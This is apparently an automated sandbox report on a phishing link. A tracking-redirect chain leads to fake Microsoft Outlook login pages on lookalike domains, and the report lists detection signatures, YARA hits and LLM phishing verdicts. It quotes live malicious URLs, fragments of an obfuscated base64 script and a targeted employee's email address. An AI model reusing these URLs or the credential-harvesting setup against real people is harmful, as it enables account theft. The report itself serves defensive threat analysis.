Edit tour

Windows Analysis Report
https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94

Overview

General Information

Sample URL:	https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%25
Analysis ID:	1460827
Infos:

Detection

HTMLPhisher

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish54

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Detected hidden input values containing email addresses (often used in phishing pages)

Detected suspicious crossdomain redirect

Found iframes

HTML body contains low number of good links

HTML page contains hidden URLs or javascript code

HTML page contains obfuscate script src

HTTP GET or POST without a user agent

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2052,i,16891363818736388635,6510281300495793530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
3.7.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.8.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.10.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.12.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

AI detected phishing page

Source: https://webnnicuttnortheastusa.com	LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://webnnicuttnortheastusa.com' does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The image resembles a Microsoft login page, which is a common target for phishing attacks. The domain name appears suspicious and unrelated to Microsoft. The presence of a login form and the use of social engineering techniques to mislead users into thinking they are logging into a legitimate Microsoft account further indicate that this is likely a phishing site. DOM: 4.10.pages.csv
Source: https://webnnicuttnortheastusa.com	LLM: Score: 9 brands: Microsoft Outlook Reasons: The URL 'https://webnnicuttnortheastusa.com' does not match the legitimate domain name 'outlook.com' associated with Microsoft Outlook. The webpage mimics the Outlook login page, which is a common social engineering technique used in phishing attacks. The presence of a login form asking for a password is another indicator of a phishing attempt. There is no CAPTCHA present, which is often used in legitimate login pages to prevent automated attacks. The overall design closely resembles a legitimate Outlook login page, which is intended to mislead users into entering their credentials. DOM: 4.12.pages.csv

Phishing site detected (based on favicon image match)

Source: https://webnnicuttnortheastusa.com	Matcher: Template: microsoft matched with high similarity
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=true	Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish54

Source: Yara match	File source: 3.7.pages.csv, type: HTML
Source: Yara match	File source: 4.8.pages.csv, type: HTML
Source: Yara match	File source: 4.10.pages.csv, type: HTML
Source: Yara match	File source: 4.12.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=true

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Matcher: Template: microsoft matched

HTTP Parser: lawrence.france@cabinetworksgroup.com

Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx

Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: Number of links: 0
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2fwebnnicuttnortheastusa.com%2fcommon%2freprocess%3fctx%3drQQIARAAjZE7bNNgFIX9x6lpS6FRWdiACCRUcPxOnKBKJE7T5tW8VIiLquD4kTiJ_bu286yyMLEgCiOIgYcYOkEnxATq1qkjlAWJpepQQaeOJGJhgzOce6Sre4fzzaNUgIpcJf-IxseOk5pG4bI6Tn_Jnpv2_Th5_VW5sv7lVuD6cFcQj7fBpbrrWk6EIGDbbUHYDEBN02U1IEODgF2J-ADAPgCHADz1XGtJXVs1R0vNlkbjtixVdVN1u9BuOjUbtq3x1bYnFGR4juV4mgmRLMmFSZYKyHyIZaigijMUreIsR2k4z_IhXGI1UqG0YJWmmQPPbC7aduv02KCtD9QTz5QGbaNiQcd9hj4HcdGNxZ1kbTEaizF4uqjAxQQF8720KOp3lpKZmNFhO_WewTVKcrYsqmZUlOuWPjBqXWnVhbGa3RT6ulEo9Ck3kdjYSK_Ek6loIyWIfMpsZNaKJXOlR7qDUDmIV5nyCqctp7lq3e3YiliweiW-ny3Xc0K5nMsUJcatUNRaxeybq5UCv43-F4QdFBt1ZEBzD8WgpZq6su8F373gyDtDopHJyWkfchG5jJx6wauJEa_O8ur9b48fCI_eX9jN_1pC9iYISg2V6govJmyim8kWc-12XlcZVgyHlgotsZ8ULYMoCfJgkc4ucBFqCwNbGPYRm5pEfYgfFfLUIQZ-YuDhGeTj1L_g758FBzPsNCa3JN1w5uY3_bpScWFTNf2RTX_PcCqyPE4dqdVWHX_knn_0378-HA4_nUNOzz95-eLtzuc3x8tHszd1vZgh6VhayHSYGm8yhGLdWGPvOp0wy8tM2qg25GB3I06kwvLCOx_yGw2&mkt=en-US&hosted=0&device_platform=Windows+10	HTTP Parser: Number of links: 0

Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal

HTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal

Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJm	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJm	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJm	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJm	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX

HTTP Parser: <input type="password" .../> found

Source: https://venicuttnortheastusa.com/?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com	HTTP Parser: No favicon
Source: https://venicuttnortheastusa.com/?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com	HTTP Parser: No favicon
Source: https://venicuttnortheastusa.com/?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal	HTTP Parser: No favicon
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=	HTTP Parser: No favicon
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_r...	HTTP Parser: No favicon
Source: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU